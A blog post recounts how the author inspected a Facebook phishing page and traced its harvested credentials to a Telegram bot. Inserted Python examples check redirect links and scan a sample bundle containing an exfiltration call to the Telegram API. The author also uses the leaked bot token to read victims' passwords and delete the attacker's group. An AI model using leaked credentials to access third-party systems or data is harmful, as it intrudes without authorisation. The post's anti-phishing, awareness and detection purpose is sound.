Adem's Dev Journey

Phishing? Not on My Watch! How I found a phishing site and How I took it down

06 Jan 2024 | 5 mins read


Hello Again!

Today I will tell you a short story about how I found a phishing site and how I took it down.

Chapter 0: Why I’m writing this

I’m writing this article because I want to raise awareness about phishing sites, especially phishing sites that target Facebook users. Many people fall for these scams and lose their accounts.

Recently, I’ve seen many Tunisian Facebook pages that were hacked, even big pages with millions of followers. I don’t want this to happen to me or to anyone else.

Chapter 1: How I found the phishing site

Have you ever imagined turning the tables on a hacker? Picture this: you’re browsing Facebook and you come across this post:

For those who donā€™t speak Arabic, it says:

āš ļøFinal warning
We've reviewed your account and noticed some unusual activity that goes against our Community Standards and Advertising Policies. Therefore, we have decided to suspend your account for the next 30 days.
This suspension will take effect within 24 hours. If you think this is a bug, click the button below to open a support ticket and let us know.
Check info on: https://facebook.com/l.php...
Please note that if we do not receive any response within 24 hours, the decision will be made by our team. Any advertising campaign can be canceled and you will no longer be able to access ads.
to thank,
Meta For Business Support Team

For the non-tech-savvy, the link looks legit. It’s a facebook.com link, so it must be safe, right? Wrong! It’s a phishing link.

l.php?u=<<URL_HERE>> is a Facebook redirect link: the facebook.com domain belongs to the redirector, not to the page you end up on.

The u parameter is the URL that the user will be redirected to.

If you click on it, you’ll be redirected to a fake Facebook form where you’ll be asked to enter your username, password, and other personal information.

If you do that, the hacker will have access to your account and will be able to do whatever he wants with it.
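How such a link can be checked before anyone clicks, as an added Python example that is not part of the original post: it parses the link, recognises the l.php wrapper, percent-decodes the u parameter and flags the real destination whenever its host is not on a small assumed allow-list of Facebook/Meta hosts. The allow-list and the sample links are constructed; the phishing destination is a placeholder domain, not the real site from the post.

```python
from urllib.parse import urlparse, parse_qs

# Assumed allow-list of hosts that belong to Facebook/Meta (a real checker would keep this
# list authoritative and complete). Matching is on the exact host, never on a substring.
TRUSTED_HOSTS = {
    "facebook.com", "www.facebook.com", "m.facebook.com",
    "meta.com", "www.meta.com",
}


def resolve_facebook_redirect(link: str) -> dict:
    """Inspect a link and, if it is a facebook.com/l.php redirect, report where it really goes.

    Returned keys:
      is_lphp_redirect  - True when the link is the l.php wrapper
      destination       - decoded value of the u parameter (None if absent)
      destination_host  - host of that destination
      suspicious        - True when the redirect leaves the trusted hosts or has no target
    """
    parsed = urlparse(link)
    host = (parsed.hostname or "").lower()
    result = {
        "link": link,
        "is_lphp_redirect": False,
        "destination": None,
        "destination_host": None,
        "suspicious": False,
    }
    # Only facebook.com/l.php is a redirector; anything else is an ordinary link for this check.
    if host not in TRUSTED_HOSTS or parsed.path != "/l.php":
        return result

    result["is_lphp_redirect"] = True
    # parse_qs percent-decodes the value, so "https%3A%2F%2F..." becomes "https://..."
    target = parse_qs(parsed.query).get("u", [None])[0]
    if not target:
        result["suspicious"] = True  # l.php without a target is malformed; do not trust it
        return result

    target_host = (urlparse(target).hostname or "").lower()
    result["destination"] = target
    result["destination_host"] = target_host
    # Exact-host comparison: "facebook.com.evil.example" is NOT facebook.com
    result["suspicious"] = target_host not in TRUSTED_HOSTS
    return result


if __name__ == "__main__":
    # Constructed sample links; the phishing host is a placeholder, not a real site
    for sample in (
        "https://facebook.com/l.php?u=https%3A%2F%2Fmeta-business-appeal.example%2Fticket",
        "https://facebook.com/l.php?u=https%3A%2F%2Fwww.facebook.com%2Fhelp",
        "https://facebook.com/l.php?u=https%3A%2F%2Ffacebook.com.evil.example%2F",
        "https://facebook.com/help",
    ):
        r = resolve_facebook_redirect(sample)
        verdict = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{verdict:10} {r['destination_host'] or '-':30} {sample}")
```

The important design choice is the exact-host comparison on the decoded destination: a substring test such as `"facebook.com" in target` would be fooled by a host like facebook.com.evil.example, which is exactly the kind of look-alike a phishing kit relies on.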

Chapter 2: Pretending to be a victim

I decided to play along and see what happens next. I clicked on the link and visited the fake Facebook form page.

⚠️ Disclaimer: I will not share the link to the phishing site. I will only share screenshots.

As you can see, the page looks legit. It has the Facebook logo, the Facebook colors, and the Facebook font.

I opened DevTools and inspected the page. It was built using Vue.js. I searched for “https” links, where the good stuff is usually hidden, and found a few interesting ones:

Let me explain what is happening here:

https://api.db-ip.com is a public website that provides IP geolocation data. It’s used to get the user’s IP address.

The developer is getting the victim’s IP address and sending it to the hacker’s server.

https://api.telegram.org is the Telegram Bot API. The hacker is using Telegram to store the victim’s data.

The hacker is sending the victim’s data to his Telegram account. He is even putting the API key in the source code.

The API key looks like this: 123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ

What a noob! 🤣 You should never put your API key in the source code. Never!

So let’s recap what we have so far:

  1. The hacker is using a fake Facebook form to steal the victim’s data.
  2. The hacker is using Vue.js to build the fake Facebook form.
  3. The hacker is using https://api.db-ip.com to get the victim’s IP address.
  4. The hacker is using Telegram to send the victim’s data to his Telegram account.
  5. The hacker is putting his Telegram API key in the source code.

Let’s see what happens next…
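The indicators in this recap can be hunted for mechanically when you inspect a suspicious page's source. The following Python scanner is an added example, not code from the original post and not anything taken from the phishing kit: it runs two regexes over a constructed JavaScript bundle (placeholder token, made-up endpoint paths, modelled on the description above) and reports hard-coded Telegram bot tokens in redacted form plus outbound calls to api.telegram.org and api.db-ip.com. The token pattern is an assumption, loosened so that the post's illustrative 123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ form is matched as well as real-length tokens.

```python
import re

# Assumed token shape: numeric bot id, a colon, then a base64url-style secret.
# Real tokens have a fixed secret length; the range is loosened here so the post's
# illustrative "123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ" form is matched too.
TELEGRAM_TOKEN_RE = re.compile(r"(?<!\d)(\d{8,10}:[A-Za-z0-9_-]{25,45})(?![A-Za-z0-9_-])")

# Outbound calls to the two services named in the post: the Telegram Bot API (exfil channel)
# and db-ip (victim geolocation). Extend the alternation for other exfil services you track.
EXFIL_URL_RE = re.compile(r"https?://(?:api\.telegram\.org|api\.db-ip\.com)[^\s\"'`)]*")


def redact_token(token: str) -> str:
    """Keep the bot id and the first 4 secret characters: enough to match a finding, not enough to reuse it."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


def find_exfil_indicators(source: str) -> list:
    """Scan page or bundle source line by line; return findings as dicts (kind, line, value)."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in TELEGRAM_TOKEN_RE.finditer(line):
            findings.append({"kind": "telegram_bot_token", "line": lineno, "value": redact_token(m.group(1))})
        for m in EXFIL_URL_RE.finditer(line):
            findings.append({"kind": "outbound_api_call", "line": lineno, "value": m.group(0)})
    return findings


def looks_like_harvester(source: str) -> bool:
    """Heuristic verdict: a hard-coded bot token plus a call to the Telegram API is the pattern from the post."""
    findings = find_exfil_indicators(source)
    has_token = any(f["kind"] == "telegram_bot_token" for f in findings)
    calls_telegram = any(
        f["kind"] == "outbound_api_call" and "api.telegram.org" in f["value"] for f in findings
    )
    return has_token and calls_telegram


# Constructed sample bundle: a placeholder token and made-up endpoint paths that follow
# the pattern described in the post. Not taken from any real phishing kit.
SAMPLE_BUNDLE = """\
// phishing-bundle.js (constructed sample)
const TOKEN = "123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ";
async function getIp() { return (await fetch("https://api.db-ip.com/v2/free/self")).json(); }
async function send(data) {
  await fetch("https://api.telegram.org/bot" + TOKEN + "/sendMessage", { method: "POST", body: JSON.stringify(data) });
}
"""

if __name__ == "__main__":
    for f in find_exfil_indicators(SAMPLE_BUNDLE):
        print(f"line {f['line']:>3}  {f['kind']:<20} {f['value']}")
    print("verdict:", "credential harvester" if looks_like_harvester(SAMPLE_BUNDLE) else "no exfil pattern found")
```

Findings are redacted at the point of collection so that a scan report can be shared (with a hosting provider or with Telegram, as the post later describes) without itself becoming a copy of the secret.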

Chapter 3: The hacker’s Telegram account

I decided to read Telegram’s API documentation to see what we can do with the API key. Surprisingly, we can do a lot of things with it.

I found Swagger documentation for the Telegram API. You can find it here: https://telegram-bot-api.vercel.app/

So I decided to play around with the API and see what happens. I sent a few requests to the API and found something interesting.

I found a list of victims: email addresses, passwords, IP addresses, and other personal information.

Most of the victims are from Arab countries: Tunisia, Algeria, Jordan, Morocco, Egypt, etc.

Using the API key, I was able to get the invite link for the hacker’s Telegram group.

Let’s see what’s inside…

This is the hacker’s Telegram group. It has 10 members.

I think the hacker is from Vietnam. I don’t speak Vietnamese, so I can’t be sure.

Chapter 4: Itā€™s time to take action

I’ve deleted the hacker’s Telegram group and reported the hacker to Telegram.

The API key is also invalid now, so the hacker can’t use it anymore. 😁

Also, I’ve reported the hacker’s website to the hosting provider and they’ve taken it down.

Thanks to the hosting provider for taking action so quickly. 👏👏👏

Chapter 5: Conclusion

Phishing is a serious problem. Many people fall for these scams and lose their accounts.

If you see a suspicious link on Facebook, don’t click on it. Report it to Facebook and they will take it down.

If you have some knowledge of web development, check the source code of the page. You might find something interesting (like I did).

And if you’re a hacker, please stop hacking people. It’s not cool. It’s not funny. It’s not worth it. Also, don’t put your API key in the source code. Never! 🤣🤣

That’s all for today. I hope you enjoyed this article. If you have any questions or comments, please leave them below.